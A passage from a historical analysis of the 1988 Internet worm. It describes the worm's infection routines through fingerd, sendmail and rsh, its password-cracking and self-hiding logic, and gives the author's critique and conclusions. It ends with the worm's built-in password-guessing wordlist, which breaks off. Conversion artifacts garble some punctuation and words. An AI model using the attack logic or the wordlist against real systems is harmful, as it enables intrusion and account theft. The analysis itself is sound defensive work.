words either! 5.2.10. cracksome This routine was a simple switch statement on an external variable named cmode and it implemented the five strategies discussed in \2474-8 of this paper. State zero called crack_0, state one called crack_1, state two called crack_2, and state three called crack_3. The default case simply returned. 5.2.11. crypt This routine took a key and a salt, then performed the UNIX password encryption function on a block of zero bits. The return value of the routine was a pointer to a character string of 13 characters representing the encoded password. The routine was highly optimized and differs considerably from the standard library version of the same routine. It called the following routines: compkeys, mungE, des, and ipi. A routine, setupE, was also present and was associated with this code, but it was never referenced. It appears to duplicate the functionality of the mungE function. 5.2.12. h_addaddr This routine added alternate addresses to a host entry in the global list if they were not already present. 5.2.13. h_addname This routine added host aliases $names$ to a given host entry. Duplicate entries were suppressed. 5.2.14. h_addr2host The host address provided to the routine was checked against each entry in the global host list to see if it was already present. If so, a pointer to that host entry was returned. If not, and if a parameter flag was set, a new entry was initialized with the argument address and a pointer to it was returned. 5.2.15. h_clean This routine traversed the host list and removed any entries marked as infected or immune $leaving hosts not yet tried$. 5.2.16. h_name2host Just like h_addr2host except the comparison was done by name with all aliases. 5.2.17. ha This routine tried to infect hosts on remote networks. First, it checked to see if the gateways list had entries; if not, it called rt_init. Next, it constructed a list of all IP addresses for gateway hosts that responded to the try_telnet routine. The list of host addresses was randomized by permute. Then, for each address in the list so constructed, the address was masked with the value returned by netmaskfor and the result was passed to the attack_network routine. If an attack was successful, the routine exited early with a return value of TRUE. 5.2.18. hg This routine attempted to infect gateway machines. It first called rt_init to reinitialize the list of gateways, and then for each gateway it called the main infection routine, infect, with the gateway as an argument. As soon as one gateway was successfully infected, the routine returned TRUE. 5.2.19. hi This routine tried to infect hosts whose entries in the hosts list were marked as equivalent. The routine traversed the global host list looking for such entries and then calling infect with those hosts. A successful infection returned early with the value TRUE. 5.2.20. hl This routine was intended to attack hosts on directly-connected networks. For each alternate address of the current host, the routine attack_network was called with an argument consisting of the address logically and-ed with the value of netmask for that address. A success caused the routine to return early with a return value of TRUE. 5.2.21. hul This function attempted to attack a remote host via a particular user. It first checked to make sure that the host was not the current host and that it had not already been marked as infected. Next, it called getaddrs to be sure there was an address to be used. It examined the username for punctuation characters, and returned if any were found. It then called other_sleep with an argument of 1. Next, the code tried the attacks described in \2474-10. Calls were made to sendworm if either attack succeeded in establishing a shell on the remote machine. 5.2.22. if_init This routine constructed the list of interfaces using ioctl calls. In summary, it obtained information about each interface that was up and running, including the destination address in point-to-point links, and any netmask for that interface. It initialized the me pointer to the first non-loopback address found, and it entered all alternate addresses in the address list. 5.2.23. infect This was the main infection routine. First, the host argument was checked to make sure that it was not the current host, that it was not currently infected, and that it had not been determined to be immune. Next, a check was made to be sure that an address for the host could be found by calling getaddrs. If no address was found, the host was marked as immune and the routine returned FALSE. Next, the routine called other_sleep with a timeout of 1. Following that, it tried, in succession, calls to try_rsh, try_fingerd, and try_sendmail. If the calls to try_rsh or try_fingerd succeeded, the file descriptors established by those invocations were passed as arguments to the sendworm call. If any of the three infection attempts succeeded, infect returned early with a value of TRUE. Otherwise, the routine returned FALSE. 5.2.24. loadobject This routine read an object file into the objects structure in memory. The file was opened and the size found with a call to the library routine fstat. A buffer was malloc'd of the appropriate size, and a call to read was made to read the contents of the file. The buffer was encrypted with a call to xorbuf, then transferred into the objects array. The suffix of the name $e.g., sun3.o, l1.c, vax.o$ was saved in a field in the structure, as was the size of the object. 5.2.25. makemagic The routine used the library random call to generate a random number for use as a challenge number. Next, it tried to connect to the telnet port $#23$ of the target host, using each alternate address currently known for that host. If a successful connection was made, the library call getsockname was called to get the canonical IP address of the current host relative to the target. Next, up to 1024 attempts were made to establish a TCP socket, using port numbers generated by taking the output of the random number generator modulo 32767. If the connection was successful, the routine returned the port number, the file descriptor of the socket, the canonical IP address of the current host, and the challenge number. 5.2.26. netmaskfor This routine stepped through the interfaces array and checked the given address against those interfaces. If it found that the address was reachable through a connected interface, the netmask returned was the netmask associated with that interface. Otherwise, the return was the default netmask based on network type $Class A, Class B, Class C$. 5.2.27. other_sleep This routine checked a global variable named other_fd. If the variable was less than zero, the routine simply called sleep with the provided timeout argument, then returned. Otherwise, the routine waited on a select system call for up to the value of the timeout. If the timeout expired, the routine returned. Otherwise, if the select return code indicated there was input pending on the other_fd descriptor, it meant there was another worm on the current machine. A connection was established and an exchange of ``magic'' numbers was made to verify identity. The local worm then wrote a random number $produced by random$ to the other worm via the socket. The reply was read and a check was made to ensure that the response came from the localhost $127.0.0.1$. The file descriptor was closed. If the random value sent plus the response was an odd number, the other_fd variable was set to -1 and the pleasequit variable was set to 1. This meant that the local worm would die when conditions were right $cf. doit $, and that it would no longer attempt to contact other worms on the local machine. If the sum was even, the other worm was destined to die. 5.2.28. permute This routine randomized the order of a list of objects. This was done by executing a loop once for each item in the list. In each iteration of the loop, the random number generator was called modulo the number of items in the list. The item in the list indexed by that value was swapped with the item in the list indexed by the current loop value $via a call to bcopy$. 5.2.29. rt_init This initialized the list of gateways. It started by setting an external counter, ngateways, to zero. Next, it invoked the command ``/usr/ucb/netstat -r -n'' using a popen call. The code then looped while output was received from the netstat command: A line was read. A call to other_sleep was made with a timeout of zero. The input line was parsed into a destination and a gateway. If the gateway was not a valid IP address, or if it was the loopback address $127.0.0.1$, it was discarded. The value was then compared against all the gateway addresses already known; duplicates were skipped. It was also compared against the list of local interfaces $local networks$, and discarded if a duplicate. Otherwise, it was added to the list of gateways and the counter incremented. 5.2.30. scan_gateways First, the code called permute to randomize the gateways list. Next, it looped over each gateway or the first 20, whichever was less: A call was made to other_sleep with a timeout of zero. The gateway IP address was searched for in the host list; a new entry was allocated for the host if none currently existed. The gateway flag was set in the flags field of the host entry. A call was made to the library routine gethostbyaddr with the IP number of the gateway. The name, aliases and address fields were added to the host list, if not already present. Then a call was made to gethostbyname and alternate addresses were added to the host list. After this loop was executed, a second loop was started that did effectively the same thing as the first! There is no clear reason why this was done, unless it is a remnant of earlier code, or a stub for future additions. 5.2.31. send_message This routine made a call to random and 14 out of 15 times returned without doing anything. In the 15th case, it opened a stream socket to host ``ernie.berkeley.edu'' and then tried to send an uninitialized byte using the sendto call. This would not work $using a UDP send on a TCP socket$. 5.2.32. sendworm This routine sent the worm code over a connected TCP circuit to a remote machine. First it checked to make sure that the objects table held a copy of the l1.c code $see Appendix B$. Next, it called makemagic to get a local socket established and to generate a challenge string. Then, it encoded and wrote the script detailed previously in \2474-2a. Finally, it called waithit and returned the result code of that routine. The object files shipped across the link were decrypted in memory first by a call to xorbuf and then re-encrypted afterwards. 5.2.33. supports_rsh This routine determined if the target host, specified as an argument, supported the BSD- derived rsh protocol. It did this by creating a socket and attempting a TCP connection to port 514 on the remote machine. A timeout or connect failure caused a return of FALSE; otherwise, the socket was closed and the return value was TRUE. 5.2.34. supports_telnet This routine determined if a host was reachable and supported the telnet protocol $i.e., was probably not a router or similar ``dumb'' box$. It was similar to supports_rsh in nature. The code established a socket, connected to the remote machine on port 23, and returned FALSE if an error or timeout occurred; otherwise, the socket was closed and TRUE was returned. 5.2.35. try_fingerd This routine tried to establish a connection to a remote finger daemon on the given host by connecting to port 79. If the connection succeeded, it sent across an overfull buffer as described in \2474-8b and waited to see if the other side became a shell. If so, it returned the file descriptors to the caller; otherwise, it closed the socket and returned a failure code. 5.2.36. try_password This routine called crypt with the password attempt and compared the result against the encrypted password in the pwd entry for the current user. If a match was found, the unencrypted password was copied into the pwd structure, and the routine attack_user was invoked. 5.2.37. try_rsh This function created two pipes and then forked a child process. The child process attempted to rexec a remote shell on the host specified in the parameters, using the specified username and password. Then the child process tried to invoke the rsh command by attempting to run, in order, ``/usr/ucb/rsh,'' ``/usr/bin/rsh,'' and ``/bin/rsh.'' If the remote shell succeeded, the function returned the file descriptors of the open pipe. Otherwise, it closed all file descriptors, killed the child with a SIGKILL, and reaped it with a call to wait3. 5.2.38. try_sendmail This routine attempted to establish a connection to the SMTP port $#25$ on the remote host. If successful, it conducted the dialog explained in \2474-2b. It then called the waithit routine to see if the infection ``took.'' Return codes were checked after each line was transmitted, and if a return code indicated a problem, the routine aborted after sending a ``quit'' message. 5.2.39. waithit This function acted as the bootstrap server for a vector program on a remote machine. It waited for up to 120 seconds on the socket created by the makemagic routine, and if no connection was made it closed the socket and returned a failure code. Likewise, if the first thing received was not the challenge string shipped with the bootstrap program, the socket was closed and the routine returned. The routine decrypted each object file using xorbuf and sent it across the connection to the vector program $see Appendix B$. Then a script was transmitted to compile and run the vector. This was described in \2474-4. If the remote host was successfully infected, the infected flag was set in the host entry and the socket closed. Otherwise, the routine sent rm command strings to delete each object file. The function returned the success or failure of the infection. 5.2.40. xorbuf This routine was somewhat peculiar. It performed a simple encryption/decryption function by XORing the buffer passed as an argument with the first 10 bytes of the xorbuf routine itself! This code would not work on a machine with a split I/D space or on tagged architectures. 6. Analysis of the Code 6.1. Structure and Style An examination of the reverse-engineered code of the worm is instructive. Although it is not the same as reading the original code, it does reveal some characteristics of the author$s$. One conclusion that may surprise some people is that the quality of the code is mediocre, and might even be considered poor. For instance, there are places where calls are made to functions with either too many or too few arguments. Many routines have local variables that are either never used, or are potentially used before they are initialized. In at least one location, a struct is passed as an argument rather than the address of the struct. There is also dead code, as routines that are never referenced, and as code that cannot be executed because of conditions that are never met $possibly bugs$. It appears that the author$s$ never used the lint utility on the program. At many places in the code, there are calls on system routines and the return codes are never checked for success. In many places, calls are made to the system heap routine, malloc and the result is immediately used without any check. Although the program was configured not to leave a core file or other evidence if a fatal failure occurred, the lack of simple checks on the return codes is indicative of sloppiness; it also suggests that the code was written and run with minimal or no testing. It is certainly possible that some checks were written into the code and elided subject to conditional compilation flags. However, there would be little reason to remove those checks from the production version of the code. The structures chosen for some of the internal data are also revealing. Everything was represented as linked lists of structures. All searches were done as linear passes through the appropriate list. Some of these lists could get quite long and doubtless that considerable CPU time was spent by the worm just maintaining and searching these lists. A little extra code to implement hash buckets or some form of sorted lists would have added little overhead to the program, yet made it much more efficient $and thus quicker to infect other hosts and less obvious to system watchers$. Linear lists may be easy to code, but any experienced programmer or advanced CS student should be able to implement a hash table or lists of hash buckets with little difficulty. Some effort was duplicated in spots. An example of this was in the code that tried to break passwords. Even if the password to an account had been found in an earlier stage of execution, the worm would encrypt every word in the dictionary and attempt a match against it. Similar redundancy can be found in the code to construct the lists of hosts to infect. There are locations in the code where it appears that the author$s$ meant to execute a particular function but used the wrong invocation. The use of the UDP send on a TCP socket is one glaring example. Another example is at the beginning of the program where the code sends a KILL signal to its parent process. The surrounding code gives strong indication that the user actually meant to do a killpg instead but used the wrong call. The one section of code that appears particularly well-thought- out involves the crypt routines used to check passwords. As has been noted in [Seel88], this code is nine times faster than the standard Berkeley crypt function. Many interesting modifications were made to the algorithm, and the routines do not appear to have been written by the same author as the rest of the code. Additionally, the routines involved have some support for both encryption anddecryption\320even though only encryption was needed for the worm. This supports the assumption that this routine was written by someone other than the author$s$ of the program, and included with this code. It would be interesting to discover where this code originated and how it came to be in the Worm program. The program could have been much more virulent had the author$s$ been more experienced or less rushed in her/his coding. However, it seems likely that this code had been developed over a long period of time, so the only conclusion that can be drawn is that the author$s$ was sloppy or careless $or both$, and perhaps that the release of the worm was premature. 6.2. Problems of Functionality There is little argument that the program was functional. In fact, we all wish it had been less capable! However, we are lucky in the sense that the program had flaws that prevented it from operating to the fullest. For instance, because of an error, the code would fail to infect hosts on a local area network even though it might identify such hosts. Another example of restricted functionality concerns the gathering of hostnames to infect. As noted already, the code failed to gather host names >From user .rhosts files early on. It also did not attempt to collect host names from other user and system files containing such names $e.g., /etc/hosts.lpd$. Many of the operations could have been done ``smarter.'' The case of using linear structures has already been mentioned. Another example would have been to sort user passwords by the salt used. If the same salt was present in more than one password, then all those passwords could be checked in parallel as a single pass was made through the dictionaries. On our machine, 5% of the 200 passwords share the same salts, for instance. No special advantage was taken if the root password was compromised. Once the root password has been broken, it is possible to fork children that set their uid and environment variables to match each designated user. These processes could then attempt the rsh attack described earlier in this report. Instead, root is treated as any other account. It has been suggested to me that this treatment of root may have been a conscious choice of the worm author$s$. Without knowing the true motivation of the author, this is impossible to decide. However, considering the design and intent of the program, I find it difficult to believe that such exploitation would have been omitted if the author had thought of it. The same attack used on the finger daemon could have been extended to the Sun version of the program, but was not. The only explanations that come to mind why this was not done are that the author lacked the motivation, the ability, the time, or the resources to develop a version for the Sun. However, at a recent meeting, Professor Rick Rashid of Carnegie-Mellon University was heard to claim that Robert T. Morris, the alleged author of the worm, had revealed the fingerd bug to system administrative staff at CMU well over a year ago. 15 Assuming this report is correct and the worm author is indeed Mr. Morris, it is obvious that there was sufficient time to construct a Sun version of the code. In fact, I asked three Purdue graduate students \(Shawn D. Ostermann, Steve J. Chapin, and Jim N. Griffoen to develop a Sun 3 version of the attack, and they did so in under three hours. The Worm author certainly must have had access to Suns or else he would not have been able to provide Sun binaries to accompany the operational worm. Motivation should also not be a factor considering everything else present in the program. With time and resources available, the only reason I cannot immediately rule out is that he lacked the knowledge of how to implement a Sun version of the attack. This seemsunlikely, but given the inconsistent nature of the rest of the code, it is certainly a possibility. However, if this is the case, it raises a new question: was the author of the Worm the original author of the VAX fingerd attack? Perhaps the most obvious shortcoming of the code is the lack of understanding about propagation and load. The reason the worm was spotted so quickly and caused so much disruption was because it replicated itself exponentially on some networks, and because each worm carried no history with it. Admittedly, there was a check in place to see if the current machine was already infected, but one out of every seven worms would never die even if there was an existing infestation. Furthermore, worms marked for self-destruction would continue to execute up to the point of having made at least one complete pass through the password file. Many approaches could have been taken by the author$s$ to slow the growth of the worm or prevent reinfestation; little is to be gained from explaining them here, but their absence from the worm program is telling. Either the author$s$ did not have any understanding of how the program would propagate, or else she/he/they did not care; the existence in the Worm of mechanisms to limit growth tends to indicate that it was a lack of understanding rather than indifference. Some of the algorithms used by the Worm were reasonably clever. One in particular is interesting to note: when trying passwords from the built-in list, or when trying to break into connected hosts, the worm would randomize the list of candidates for trial. Thus, if more than one worm were present on the local machine, they would be more likely to try candidates in a different order, thus maximizing their coverage. This implies, however $as does the action of the pleasequit variable$ that the author$s$ was not overly concerned with the presence of multiple worms on the same machine. More to the point, multiple worms were allowed for a while in an effort to maximize the spread of the infection. This also supports the contention that the author did not understand the propagation or load effects of the Worm. The design of the vector program, the ``thinning'' protocol, and the use of the internal state machine were all clever and non-obvious. The overall structure of the program, especially the code associated with IP addresses, indicates considerable knowledge of networking and the routines available to support it. The knowledge evidenced by that code would indicate extensive experience with networking facilities. This, coupled with some of the errors in the Worm code related to networking, further support the thesis that the author was not a careful programmer\320the errors in those parts of the code were probably not errors because of ignorance or inexperience. 6.3. Camouflage Great care was taken to prevent the worm program from being stopped. This can be seen by the caution with which new files were introduced into a machine, including the use of random challenges. It can be seen by the fact that every string compiled into the worm was encrypted to prevent simple examination. It was evidenced by the care with which files associated with the worm were deleted from disk at the earliest opportunity, and the corresponding contents were encrypted in memory when loaded. It was evidenced by the continual forking of the process, and the $faulty$ check for other instances of the worm on the local host. The code also evidences precautions against providing copies of itself to anyone seeking to stop the worm. It sets its resource limits so it cannot dump a core file, and it keeps internal data encrypted until used. Luckily, there are other methods of obtaining core files and data images, and researchers were able to obtain all the information they needed to disassemble and reverse-engineer the code. There is no doubt, however, that the author$s$ of the worm intended to make such a task as difficult as possible. 6.4. Specific Comments Some more specific comments are worth making. These are directed to particular aspects of the code rather than the program as a whole. 6.4.1. The sendmail attack Many sites tend to experience substantial loads because of heavy mail traffic. This is especially true at sites with mailing list exploders. Thus, the administrators at those sites have configured their mailers to queue incoming mail and process the queue periodically. The usual configuration is to set sendmail to run the queue every 30 to 90 minutes. The attack through sendmail would fail on these machines unless the vector program were delivered into a nearly empty queue within 120 seconds of it being processed. The reason for this is that the infecting worm would only wait on the server socket for two minutes after delivering the ``infecting mail.'' Thus, on systems with delayed queues, the vector process would not get built in time to transfer the main worm program over to the target. The vector process would fail in its connection attempt and exit with a non-zero status. Additionally, the attack through sendmail invoked the vector program without a specific path. That is, the program was invoked with ``foo'' instead of ``./foo'' as was done with the shell-based attack. As a result, on systems where the default path used by sendmail's shell did not contain the current directory $``.''$, the invocation of the code would fail. It should be noted that such a failure interrupts the processing of subsequent commands $such as the rm of the files$, and this may be why many system administrators discovered copies of the vector program source code in their /usr/tmp directories. 6.4.2. The machines involved As has already been noted, this attack was made only on Sun 3 machines and VAX machines running BSD UNIX. It has been observed in at least one mailing list that had the Sun code been compiled with the -mc68010 flag, more Sun machines would have fallen victim to the worm. It is a matter of some curiosity why more machines were not targeted for this attack. In particular, there are many Pyramid, Sequent, Gould, Sun 4, and Sun i386 machines on the net. 16 If binary files for those had also been included, the worm could have spread much further. As it was, some locations such as Ohio State were completely spared the effects of the worm because all their ``known'' machines were of a type that the worm could not infect. Since the author of the program knew how to break into arbitrary UNIX machines, it seems odd that he/she did not attempt to compile the program on foreign architectures to include with the worm. 6.4.3. Portability considerations The author$s$ of the worm may not have had much experience with writing portable UNIX code, including shell scripts. Consider that in the shell script used to compile the vector, the following command is used: if [ -f sh ] The use of the [ character as a synonym for the test function is not universal. UNIX users with experience writing portable shell files tend to spell out the operator test rather than rely on therebeing a link to a file named ``['' on any particular system. They also know that the test operator is built-in to many shells and thus faster than the external [ variant. The test invocation used in the worm code also uses the -f flag to test for presence of the file named sh. This provided us with the worm ``condom'' published Thursday night: 17 creating a directory with the name sh in /usr/tmp causes this test to fail, as do later attempts to create executable files by that name. Experienced shell programmers tend to use the -e $exists$ flag in circumstances such as this, to detect not only directories, but sockets, devices, named FIFOs, etc. Other colloquialisms are present in the code that bespeak a lack of experience writing portable code. One such example is the code loop where file units are closed just after the vector program starts executing, and again in the main program just after it starts executing. In both programs, code such as the following is executed: for $i = 0; i < 32; i++$ close$i$; The portable way to accomplish the task of closing all file descriptors $on Berkeley-derived systems$ is to execute: for $i = 0; i < getdtablesize\($; i++\) close $i$; or the even more efficient for $i = getdtablesize\($-1; i >= 0; i--\) close$i$; This is because the number of file units available $and thus open$ may vary from system to system. 6.5. Summary Many other examples can be drawn from the code, but the points should be obvious by now: the author of the worm program may have been a moderately experienced UNIX programmer, but s/he was by no means the ``UNIX Wizard'' many have been claiming. The code employs a few clever techniques and tricks, but there is some doubt if they are all the original work of the Worm author. The code seems to be the product of an inexperienced or sloppy programmer. The person $or persons$ who put this program together appears to lack fundamental insight into some algorithms, data structures, and network propagation, but at the same time has some very sophisticated knowledge of network features and facilities. The code does not appear to have been tested $although anything other than unit testing would not be simple to do$, or else it was prematurely released. Actually, it is possible that both of these conclusions are correct. The presence of so much dead and duplicated code coupled with the size of some data structures $such as the 20-slot object code array$ argues that the program was intended to be more comprehensive. 7. Conclusions It is clear from the code that the worm was deliberately designed to do two things: infect as many machines as possible, and be difficult to track and stop. There can be no question that this was in any way an accident, although its release may have been premature. It is still unknown if this worm, or a future version of it, was to accomplish any other tasks. Although an author has been alleged $Robert T. Morris$, he has not publicly confessed nor has the matter been definitively proven. Considering the probability of both civil and criminal legal actions, a confession and an explanation are unlikely to be forthcoming any time soon. Speculation has centered on motivations as diverse as revenge, pure intellectual curiosity, and a desire to impress someone. This must remain speculation for the time being, however, since we do not have access to a definitive statement >From the author$s$. At the least, there must be some question about the psychological makeup of someone who would build and run such software. 18 Many people have stated that the authors of this code 19 must have been ``computer geniuses'' of some sort. I have been bothered by that supposition since first hearing it, and after having examined the code in some depth, I am convinced that this program is not evidence to support any such claim. The code was apparently unfinished and done by someone clever but not particularly gifted, at least in the way we usually associate with talented programmers and designers. There were many bugs and mistakes in the code that would not be made by a careful, competent programmer. The code does not evidence clear understanding of good data structuring, algorithms, or even of security flaws in UNIX. It does contain clever exploitations of two specific flaws in system utilities, but that is hardly evidence of genius. In general, the code is not that impressive, and its ``success'' was probably due to a large amount of luck rather than any programming skill possessed by the author. Chance favored most of us, however. The effects of this worm were $largely$ benign, and it was easily stopped. Had the code been tested and developed further by someone more experienced, or had it been coupled with something destructive, the toll would have been considerably higher. I can easily think of several dozen people who could have written this program, and not only done it with far fewer $if any$ errors, but made it considerably more virulent. Thankfully, those individuals are all responsible, dedicated professionals who would not consider such an act. What we learn from this about securing our systems will help determine if this is the only such incident we ever need to analyze. This attack should also point out that we need a better mechanism in place to coordinate information about security flaws and attacks. The response to this incident was largely ad hoc, and resulted in both duplication of effort and a failure to disseminate valuable information to sites that needed it. Many site administrators discovered the problem from reading the newspaper or watching the television. The major sources of information for many of the sites affected seems to have been Usenet news groups and a mailing list I put together when the worm was first discovered. Although useful, these methods did not ensure timely, widespread dissemination of useful information \320 especially since they depended on the Internet to work! Over three weeks after this incident some sites are still not reconnected to the Internet. This is the second time in six months that a major panic has hit the Internet community.The first occurred in May when a rumor swept the community that a ``logic bomb'' had been planted in Sun software by a disgruntled employee. Many, many sites turned their system clocks back or they shut off their systems to prevent damage. The personnel at Sun Microsystems responded to this in an admirable fashion, conducting in-house testing to isolate any such threat, and issuing information to the community about how to deal with the situation. Unfortunately, almost everyone else seems to have watched events unfold, glad that they were not the ones who had to deal with the situation. The worm has shown us that we are all affected by events in our shared environment, and we need to develop better information methods outside the network before the next crisis. This whole episode should cause us to think about the ethics and laws concerning access to computers. The technology we use has developed so quickly it is not always simple to determine where the proper boundaries of moral action may be. Many senior computer professionals started their careers years ago by breaking into computer systems at their colleges and places of employment to demonstrate their expertise. However, times have changed and mastery of computer science and computer engineering now involves a great deal more than can be shown by using intimate knowledge of the flaws in a particular operating system. Entire businesses are now dependent, wisely or not, on computer systems. People's money, careers, and possibly even their lives may be dependent on the undisturbed functioning of computers. As a society, we cannot afford the consequences of condoning or encouraging behavior that threatens or damages computer systems. As professionals, computer scientists and computer engineers cannot afford to tolerate the romanticization of computer vandals and computer criminals. This incident should also prompt some discussion about distribution of security- related information. In particular, since hundreds of sites have ``captured'' the binary form of the worm, and since personnel at those sites have utilities and knowledge that enables them to reverse-engineer the worm code, we should ask how long we expect it to be beneficial to keep the code unpublished? As I mentioned in the introduction, at least five independent groups have produced reverse-engineered versions of the worm, and I expect many more have been done or will be attempted, especially if the current versions are kept private. Even if none of these versions is published in any formal way, hundreds of individuals will have had access to a copy before the end of the year. Historically, trying to ensure security of software through secrecy has proven to be ineffective in the long term. It is vital that we educate system administrators and make bug fixes available to them in some way that does not compromise their security. Methods that prevent the dissemination of information appear to be completely contrary to that goal. Last, it is important to note that the nature of both the Internet and UNIX helped to defeat the worm as well as spread it. The immediacy of communication, the ability to copy source and binary files from machine to machine, and the widespread availability of both source and expertise allowed personnel throughout the country to work together to solve the infection even despite the widespread disconnection of parts of the network. Although the immediate reaction of some people might be to restrict communication or promote a diversity of incompatible software options to prevent a recurrence of a worm, that would be entirely the wrong reaction. Increasing the obstacles to open communication or decreasing the number of people with access to in-depth information will not prevent a determined attacker\320it will only decrease the pool of expertise and resources available to fight such an attack. Further, such an attitude would be contrary to the whole purpose of having an open, research-oriented network. The Worm was caused by a breakdown of ethics as well as lapses in security\320a purely technological attempt at prevention will not address the full problem, and may just cause new difficulties. Acknowledgments Much of this analysis was performed on reverse-engineered versions of the worm code. The following people were involved in the production of those versions: Donald J. Becker of Harris Corporation, Keith Bostic of Berkeley, Donn Seeley of the University of Utah, Chris Torek of the University of Maryland, Dave Pare of FX Development, and the team at MIT: Mark W. Eichin, Stanley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochlis, Ken Raeburn, Hal Birkeland and John T. Kohl. A disassembled version of the worm code was provided at Purdue by staff of the Purdue University Computing Center, Rich Kulawiec in particular. Thanks to the individuals who reviewed early drafts of this paper and contributed their advice and expertise: Don Becker, Kathy Heaphy, Brian Kantor, R. J. Martin, Richard DeMillo, and especially Keith Bostic and Steve Bellovin. My thanks to all these individuals. My thanks and apologies to anyone who should have been credited and was not. References Allm83. Allman, Eric, Sendmail\320An Internetwork Mail Router, University of California, Berkeley, 1983. Issued with the BSD UNIX documentation set. Brun75. Brunner, John, The Shockwave Rider, Harper & Row, 1975. Cohe84. Cohen, Fred, ``Computer Viruses: Theory and Experiments,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUTER SECURITY CONFERENCE, pp. 240-263, 1984. Denn88. Denning, Peter J., ``Computer Viruses,'' AMERICAN SCIENTIST, vol. 76, pp. 236-238, May-June 1988. Dewd85. Dewdney, A. K., ``A Core War Bestiary of viruses, worms, and other threats to computer memories,'' SCIENTIFIC AMERICAN, vol. 252, no. 3, pp. 14-23, May 1985. Gerr72. Gerrold, David, When Harlie Was One, Ballentine Books, 1972. The first edition. Gram84. Grampp, Fred. T. and Robert H. Morris, ``UNIX Operating System Security,'' AT&T BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part 2, pp. 1649-1672, Oct. 1984. Harr77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI Network Information Center, December 1977. Morr79. Morris, Robert and Ken Thompson, ``UNIX Password Security,'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 594- 597, ACM, November 1979. Post82. Postel, Jonathan B., ``Simple Mail Transfer Protocol,'' RFC 821, SRI Network Information Center, August 1982. Reid87. Reid, Brian, ``Reflections on Some Recent Widespread Computer Breakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no. 2, pp. 103-105, ACM, February 1987. Ritc79.Ritchie, Dennis M., ``On the Security of UNIX, '' in U nt 2 def IX nt 0 def SUPPLEMENTARY DOCUMENTS, AT & T, 1979. Seel88. Seeley, Donn, ``A Tour of the Worm,'' TECHNICAL REPORT, Computer Science Dept., University of Utah, November 1988. Unpublished report. Shoc82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs \320 Early Experience with a Distributed Computation,'' COMMUNICATIONS OF THE ACM, vol. 25, no. 3, pp. 172-180, ACM, March 1982. Appendix A The Dictionary What follows is the mini-dictionary of words contained in the worm. These were tried when attempting to break user passwords. Looking through this list is, in some sense revealing, but actually raises a significant question: how was this list chosen? The assumption has been expressed by many people that this list represents words commonly used as passwords; this seems unlikely. Common choices for passwords usually include fantasy characters, but this list contains none of the likely choices $e.g., ``hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan''$. Names of relatives and friends are often used, and we see women's names like ``jessica,'' ``caroline,'' and ``edwina,'' but no instance of the common names ``jennifer'' or ``kathy.'' Further, there are almost no men's names such as ``thomas'' or either of ``stephen'' or ``steven'' $or ``eugene''!$. Additionally, none of these have the initial letters capitalized, although that is often how they are used in passwords. Also of interest, there are no obscene words in this dictionary, yet many reports of concerted password cracking experiments have revealed that there are a significant number of users who use such words $or phrases$ as passwords. The list contains at least one incorrect spelling: ``commrades'' instead of ``comrades''; I also believe that ``markus'' is a misspelling of ``marcus.'' Some of the words do not appear in standard dictionaries and are non-English names: ``jixian,'' ``vasant,'' ``puneet,'' etc. There are also some unusual words in this list that I would not expect to be considered common: ``anthropogenic,'' ``imbroglio,'' ``umesh,'' ``rochester,'' ``fungible,'' ``cerulean,'' etc. I imagine that this list was derived from some data gathering with a limited set of passwords, probably in some known $to the author$ computing environment. That is, some dictionary-based or brute-force attack was used to crack a selection of a few hundred passwords taken >From a small set of machines. Other approaches to gathering passwords could also have been used\320Ethernet monitors, Trojan Horse login programs, etc. However they may have been cracked, the ones that were broken would then have been added to this dictionary. Interestingly enough, many of these words are not in the standard on-line dictionary $in /usr/dict/words$. As such, these words are useful as a supplement to the main dictionary- based attack the worm used as strategy #4, but I would suspect them to be of limited use before that time. This unusual composition might be useful in the determination of the author$s$ of this code. One approach would be to find a system with a user or local dictionary containing these words. Another would be to find some system$s$ where a significant quantity of passwords could be broken with this list. aaa academia aerobics airplane albany albatross albert alex alexander algebra aliases alphabet ama amorphous analog anchor andromache animals answer anthropogenic anvils anything aria ariadne arrow arthur athena atmosphere aztecs azure bacchus bailey banana bananas bandit banks barber baritone bass bassoon batman beater beauty beethoven beloved benz beowulf berkeley berliner beryl beverly bicameral bob brenda brian bridget broadway bumbling burgess campanile cantor cardinal carmen carolina caroline cascades castle cat cayuga celtics cerulean change charles charming charon chester cigar classic clusters coffee coke collins commrades computer condo cookie cooper cornelius couscous creation creosote cretin daemon dancer daniel danny dave december defoe deluge desperate develop dieter digital discovery disney dog drought duncan eager easier edges edinburgh edwin edwina egghead eiderdown eileen einstein elephant elizabeth ellenemeraldengine engineer enterprise enzyme ersatz establish estate euclid evelyn extension fairway felicia fender fermat fidelity finite fishers flakes float flower flowers foolproof football foresight format forsythe fourier fred friend frighten fun fungible gabriel gardner garfield gauss george gertrude ginger glacier gnu golfer gorgeous gorges gosling gouge graham gryphon guestguitargumption guntis hacker hamlet handily happening harmony harold harvey hebrides heinlein hello help herbert hiawatha hibernia honey horse horus hutchins imbroglio imperial include ingres inna innocuous irishman isis japan jessica jester jixian johnny joseph joshua judith juggle julia kathleen kermit kernel kirkland knight ladle lambda lamination larkin larry lazaruslebesguelee leland leroy lewis light lisa louis lynne macintosh mack maggot magic malcolm mark markus marty marvin master maurice mellon merlin mets michael michelle mike minimum minsky moguls moose morley mozart nancy napoleon nepenthe ness network newton next noxious nutrition nyquist oceanography ocelot olivetti olivia oracle orca orwell osirisoutlawoxford pacific painless pakistan pam papers password patricia penguin peoria percolate persimmon persona pete peter philip phoenix pierre pizza plover plymouth polynomial pondering pork poster praise precious prelude prince princeton protect protozoa pumpkin puneet puppet rabbit rachmaninoff rainbow raindrop raleigh random rascal really rebecca remote rick ripple robotics rochesterrolexromano ronald rosebud rosemary roses ruben rules ruth sal saxon scamper scheme scott scotty secret sensor serenity sharks sharon sheffield sheldon shiva shivers shuttle signature simon simple singer single smile smiles smooch smother snatch snoopy soap socrates sossina sparrows spit spring springer squires strangle stratford stuttgart subway success summer supersuperstage support supported surfer suzanne swearer symmetry tangerine tape target tarragon taylor telephone temptation thailand tiger toggle tomato topography tortoise toyota trails trivial trombone tubas tuttle umesh unhappy unicorn unknown urchin utility vasant 